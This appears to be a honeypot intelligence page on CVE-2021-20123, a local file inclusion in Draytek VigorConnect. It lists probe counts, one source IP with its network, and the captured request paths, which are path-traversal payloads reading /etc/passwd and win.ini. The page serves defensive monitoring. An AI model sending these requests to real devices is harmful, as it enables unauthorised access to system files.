CVE-2021-20123: Draytek VigorConnect 1.6.0-B - Local File Inclusion
HoneyLabs honeypots recorded 2 probes matching CVE-2021-20123 from 1 distinct source IP addresses in the last 7 days. Severity is rated high.
This CVE is on CISA's Known Exploited Vulnerabilities list.
Request paths that identify it
- /ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything
- /ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything
Addresses probing it
| Source IP | Probes | Network | Country |
|---|---|---|---|
| 93.123.109.214 | 2 | Techoff Srv Limited | Bulgaria |
Networks it comes from
| ASN | Organisation | Probes | Source IPs |
|---|---|---|---|
| AS48090 | Techoff Srv Limited | 2 | 1 |
Captured requests
- /ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything
- /ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything
CVE report
CVE report
Open a specific CVE from the CVE tracker.